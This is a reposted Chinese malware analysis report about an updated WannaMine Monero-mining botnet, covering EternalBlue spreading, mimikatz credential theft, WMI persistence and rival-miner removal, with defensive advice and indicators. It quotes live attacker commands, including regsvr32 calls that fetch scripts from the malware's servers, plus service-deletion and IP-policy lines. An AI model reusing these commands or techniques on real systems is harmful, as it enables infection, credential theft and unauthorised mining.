当前位置:首页 > 网站入侵 > 正文内容

挖矿资源争夺加剧,WannaMine 多种手法驱赶竞争者

访客56年前 (1970-01-01)网站入侵404

感谢腾讯御见威胁情报中心来稿!

原文:https://mp.weixin.qq.com/s/GGD563kHbxrvt-XRitjUbQ

一、背景

腾讯安全御见威胁情报中心检测到WannaMine挖矿僵尸 *** 再度更新,WannaMine最早于2017年底被发现,主要采用Powershell“无文件”攻击组成挖矿僵尸 *** 。更新后的WannaMine具有更强的传播性,会采用多种手法清理、阻止竞争木马的挖矿行为,同时安装远控木马完全控制中毒系统。

本次更新后的WannaMine病毒具有以下特点:

  • 利用“永恒之蓝”漏洞攻击传播;
  • 利用mimiktaz抓取域登录密码结合WMI的远程执行功能在内网横向移动;
  • 通过添加IP策略阻止本机连接对手木马的47个矿池,阻止其他病毒通过“永恒之蓝”漏洞入侵;
  • 添加计划任务,WMI事件消费者进行持久化攻击,删除“MyKings”病毒的WMI后门;
  • 利用COM组件注册程序regsvr32执行恶意脚本;
  • 利用WMIClass存取恶意代码;
  • 在感染机器下载Gh0st远控木马conhernece.exe和门罗币挖矿木马steam.exe。
  • 二、详细分析

    WannaMine安装计划任务进行持久化,计划任务名:’Microsoft\Windows\MUI\LMRemove’,

    ‘Microsoft\Windows\Multimedia\SystemEventService’,执行以下命令:

    regsvr32 /u /s /i:http://safe.lxb.monster/networks.xsl scrobj.dll

    regsvr32 /u /s /i:http://skt.xiaojiji.nl/networks.xsl scrobj.dll

    Regsvr32.exe是一个命令行程序,用于在Windows系统上注册和注销对象链接和嵌入控件,包括动态链接库(DLL),Regsvr32.exe可用于执行任意二进制文件。由于regsvr32.exe支持 *** *** ,因此可以通过在调用期间将统一资源定位符(URL)作为参数传递外部Web服务器上的文件来加载脚本。

    在计划任务执行时,恶意脚本networks.xsl被Regsvr32.exe执行。networks.xsl实际上使用XML语言描述,其中被嵌入了一段 *** cript脚本,功能为通过CMD命令执行一段加密的Powershell代码。

    两段Powershell代码解码后如下:

    分别从http[:]//skt.xiaojiji.nl/networks.ps1和

    http[:]//safe.dashabi.nl/networks.ps1下载得到文件networks.ps1。networks.ps1经过加密的Powershell脚本,也是是核心攻击代码。代码首先中定义了三个变量$miiiiii ,$fffffff,$ssssssss来分别保存加密数据,然后继续执行,后续代码中会读取并解密变量中的数据。

    变量之后的代码以字符“&( $VerBOsepreFErEnce.ToSTrinG()[1,3]+’X’-joiN”)“开头,这段字符在Powershell的混淆代码中较为常见,功能等同于Powershell命令中的“IEX”(Invoke-Expression),IEX用于将字符串作为命令执行,当去掉IEX后,执行后就会显示原本的字符串。

    我们将这段字符替换为自定义输出命令“write-host”,即可得到解码后的Powershell代码。

    核心Powershell删除竞争对手安装的WMI后门代码,包括属于MyKings僵尸 *** 的“ *** youmm3” ,“ *** youmm4”,” *** youmm”,“ *** amm3”后门,以及属于未知团伙的“BotFilter82“,“BotConsumer23”,” BotFilter82”后门。

    然后通过以下代码安装WMI事件消费者,其中事件过滤器名$filterName = (‘Windows Events Filter’),事件消费者名$consumerName = (‘Windows Events Consumer’)。当捕获到指定的事件发生时执行恶意代码”$EncodedScript”,达到持久化攻击的目的。

    对比2019年4月WannaMine代码可以发现基础设施已发生变化:

    旧版:

    备用服务器地址:profetestruec.net、45.199.154.108、172.247.116.87

    默认下载地址:172.247.116.8

    默认端口:8000

    核心Powershell:in6.ps1,in3.ps1

    新版:

    备用服务器地址:safe.dashabi.nl、45.77.148.102、skt.xiaojiji.nl

    默认下载地址:skt.xiaojiji.nl

    默认端口:80

    核心Powershell:network.ps1

    申请一个名为“root\default:System_Anti_Virus_Core “的WMI对象,将变量中的数据保存到WMIClass当中以备后续使用。

    接着从变量$fffffff中获取代码$defun执行。

    $defun中函数Download_file()负责下载文件并保持到temp目录下。

    RunDDOS()负责启动DDOS进程。

    RunXMR()负责启动门罗币挖矿进程。

    KillBot()负责清除竞争对手,杀死进程命令行包含字符“System_Anti_Virus_Core “,”cryptonight “的进程,同时杀死使用端口3333、5555、7777进行TCP通信的进程。

    实现了“永恒之蓝“漏洞攻击代码,攻击函数为eb7()、eb8()。、

    Get-IpInB()函数从网卡配置信息中获取IP地址,取A段和B段作为IP地址开头,然后随机生成C段和D段组成待攻击的IP地址列表。

    在Test-Port()中测试IP地址是否开放445端口,在Get-creds()中通过密码抓取工具mimiktaz获取当前域登录密码,得到Username、Domain、Password/NTLM数据并保存。

    密码搜集工具mimiktaz由初始阶段定义的三个变量之一的$miiiiii解密获得。在Test-ip()中针对mimiktaz获取到域登录凭证的IP进行攻击,利用WMI的远程命令执行功能,调用Invoke-WmiMethod执行远程Powershell命令(64位执行

    http[:]//safe.dashabi.nl/networks.ps1,32位执行http[:]//safe.dashabi.nl/netstat.ps1)。

    核心Powershell利用“永恒之蓝“漏洞攻击工具进行攻击。首先调用[PingCastle.Scanners.m17sc]::Scan()进行漏洞扫描,将存在漏洞的IP保存至$i17中,然后调用攻击函数eb7()和eb8()进行攻击。

    在目标系统执行shellcode命令$sc,该命令内容由之前的三个变量之一$ssssssss中解密得到,主要功能为判断WMI中是否存在root\Subscription -Class __FilterToConsumerBinding命名空间下的null对象或者不含“Windows Events Filter“字符的对象,如果是则执行远程恶意代码:http[:]//207.246.124.125/networks.ps1

    RunDDOS(Gh0st远控木马)

    Networks.ps1中解码出$fffffff后,调用其函数RunDDOS ,指定参数”cohernece.exe”,从http[:]//safe.dashabi.nl/coherence. *** 二进制数据,并还原成PE文件cohernece.exe到%Temp%目录下,通过start-process命令执行。

    分析发现,该文件当前并非DDOS木马,而是Gh0st远控木马,当前使用的C&C地址为six.lxb.monster:8447。

    Gh0st远控木马较为常见,技术分析从略。

    RunXMR

    Networks.ps1中解码出$fffffff后,调用其函数RunXMR,指定参数”steam.exe”,从http[:]//safe.dashabi.nl/steam. *** 二进制数据,并还原成PE文件steam.exe到%Temp%目录下,通过start-process命令执行。steam.exe为自解压程序,解压目录为c:\windows\fonts\Wbems\,解压结束后首先执行bat脚本c:\windows\fonts\Wbems\1.bat。

    再次删除竞争对手的服务:

    sc stop “evemt windows”

    sc delete “evemt windows”

    sc stop “event log”

    sc delete “event log”

    sc stop ias

    sc delete ias

    sc stop FastUserSwitchingCompatibility

    sc delete FastUserSwitchingCompatibility

    sc stop MicrosoftMysql

    sc delete MicrosoftMysql

    设置解压目录下的木马文件为隐藏、系统属性:

    attrib -a -s -h c:\windows\fonts\Wbems\*.exe

    启动c:\windows\fonts\Wbems\ipp.exe,该文件也是Gh0st远控木马。

    将解压出的病毒文件拷贝到目标目录下

    netsh ipsec static importpolicy file=c:\windows\fonts\Wbems\close.ipsec,将木马释放的IP安全策略文件close.ipsec导入到当前机器。

    close.ipsec通过配置IP筛选器,阻止本机向其他47个矿池IP地址发起的TCP *** 连接,从而阻止竞品木马的挖矿行为。

    阻止任何地址与本机的139/445端口的TCP或UDP通信,包括局域网和远程连接,从而阻止其他病毒通过“永恒之蓝”漏洞入侵。

    通过SetACL.exe修复注册表”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator”的访问属性,并在该注册表下写入StartExe值,利用微软”The Ease of Access Center”(便捷访问中心)特性来启动木马uas.exe。

    然后通过服务管理程序msdtc,将挖矿木马xx.exe安装为服务”Event Logs”并启动服务。设置服务的DisplayName和Description值如下:

    DisplayName “USO Services”

    Description “Manages profiles and accounts on a SharedPC configured device”

    挖矿程序xx.exe采用XMRig 5.4.0版本编译,支持CPU和NVIDIA CUDA显卡GPU挖矿(4.5.0以后)。

    使用以下矿池:

    xmr.wulifang.nl:80

    91.121.140.167:443

    hash.wulifang.nl:80

    131.153.76.130:443

    xme.wulifang.nl:13531

    47.101.30.124:13531

    fr.minexmr.com:80

    钱包:

    44AVCF3zFkWLKYrXQ7A2L4MjWxhJNxzZZczD8N9LjEbE9PCwdjRg1iJ4oHedTxngSVKKV8H74ZDXgHoq9Wgt3cVkJn3eNbS

    三、安全建议

    根据该病毒的技术特点,我们建议企业采取以下措施加以防范:

  • 使用安全的密码策略,切勿使用弱口令;
  • 及时修复Windows系统漏洞,推荐使用腾讯御点、腾讯电脑管家、或Windows Update修补漏洞,亦可参考以下链接重点修复永恒之蓝相关漏洞;(1)MS17-010永恒之蓝漏洞补丁下载地址(2)XP、WindowsServer2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598(3)Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
  • 尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的指定IP连接登陆;
  • 对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器;
  • 当系统出现异常时,检查计划任务和WMI(可用WMITools.exe)中是否有存在可疑脚本命令
  • 推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
  • IOCs

    IP

    45.77.148.102

    207.246.124.125

    Domain

    safe.dashabi.nl

    safe.lxb.monster

    six.lxb.monster

    skt.xiaojiji.nl

    URL

    http[:]//safe.lxb.monster/networks.xsl

    http[:]//skt.xiaojiji.nl/networks.xsl

    http[:]//skt.xiaojiji.nl/networks.ps1

    http[:]//safe.dashabi.nl/networks.ps1

    http[:]//safe.dashabi.nl/netstat.ps1

    http[:]//207.246.124.125/networks.ps1

    http[:]//safe.dashabi.nl/coherence.txt

    http[:]//safe.dashabi.nl/steam.txt

    参考链接:

    WannaMine挖矿木马更新基础设施 新手法已大赚17万

    WannaMine挖矿木马再活跃,14万台linux系统受攻击

    扫描二维码推送至手机访问。

    版权声明:本文由黑客技术发布,如需转载请注明出处。

    本文链接:http://w-123.com/33069.html

    返回列表

    没有更早的文章了...

    下一篇:如何找回qq密码(手机号也停用了)

    “挖矿资源争夺加剧,WannaMine 多种手法驱赶竞争者” 的相关文章

    未打补丁的 Exchange 服务器遭 Hive 勒索攻击 逾期就公开数据

    虽然在 2021 年微软就已针对 Hive 勒索软件发布 Exchange 服务器的安全补丁,并敦促企业及时进行部署,但是依然有一些组织并没有及时跟进。消息称这些尚未跟进的组织近日再次遭受了 Hive 勒索软件的攻击,被黑客获得了系统权限。 在攻击获得系统权限之后,该勒索软件就会通过 PowerSh...

    流行软件包管理器中发现多重安全漏洞

    Hackernews 编译,转载请注明出处: 在流行的包管理器中已经揭露多个安全漏洞,如果被潜在黑客利用,可能被滥用来运行任意代码和访问敏感信息,包括受感染设备的源代码和访问令牌。 然而,值得注意的是,这些漏洞要求目标开发人员同时处理一个受影响的软件包管理器和一个恶意软件包。 So...

    美政府提醒区块链行业警惕 Lazarus Group 加密货币木马应用程序

    在周一发布的联合公告中,美国网络与基础设施安全局(CISA)、联邦调查局(FBI)和财政部指出 —— 被称作 Lazarus Group 的黑客组织,正在使用被植入木马的加密货币应用程序,向区块链行业的各个组织发起攻击。据说受害者中包括加密货币交易所、风投、持有大量加密货币 / 非同质化代币(NFT...

    因担心通风报信 FBI 暂缓公开 REvil 恶意软件的密钥

    今年夏季 REvil 团伙发起了将近 3 周的大规模恶意软件攻击,美国联邦调查局(FBI)秘密扣留了密钥。该密钥本可以解密多达 1500 个网络上的数据和计算机,包括医院、学校和企业运营的网络。 援引华盛顿邮报报道,联邦调查局渗透了 REvil 团伙的服务器以获得该密钥。不过在和其他机构讨论之后,...

    一起钓鱼网络攻击泄露了 Revere Health 12000 名患者的医疗信息

    据外媒报道,根据医疗保健公司Revere Health上周五发布的新闻稿称,一名医疗保健员工沦为一个网络钓鱼邮件攻击的对象,由此泄露了约1.2万名患者的一些医疗记录–其中包括圣乔治的心脏病患者。 Revere Health营销和沟通主管Bob Freeze表示,6月21日,这名员工的电子邮件被侵入了...

    4 个近期猖獗的新兴勒索软件团体曝光 对企业和关键基础设施构成严重威胁

    本周二,网络安全研究人员揭开了 4 个近期比较猖獗的新兴勒索软件团体,它们可能对企业和关键基础设施构成严重威胁。最近勒索软件事件激增的连锁反应表明,攻击者在从受害者那里获取报酬方面正变得越来越复杂,越来越有利可图。 在分享给 The Hacker News 的一份报告中,Palo Alto Net...

    评论列表

    馥妴迟山
    2年前 (2022-05-28)

    据,然后继续执行,后续代码中会读取并解密变量中的数据。变量之后的代码以字符“&( $VerBOsepreFErEnce.ToSTrinG()[1,3]+’X’-joiN”)“开头,这段字符在P

    鸠骨将离
    2年前 (2022-05-28)

    发起的TCP网络连接,从而阻止竞品木马的挖矿行为。阻止任何地址与本机的139/445端口的TCP或UDP通信,包括局域网和远程连接,从而阻止其他病毒通过“永恒之蓝”漏洞入侵。通过Se

    发表评论

    访客

    ◎欢迎参与讨论,请在这里发表您的看法和观点。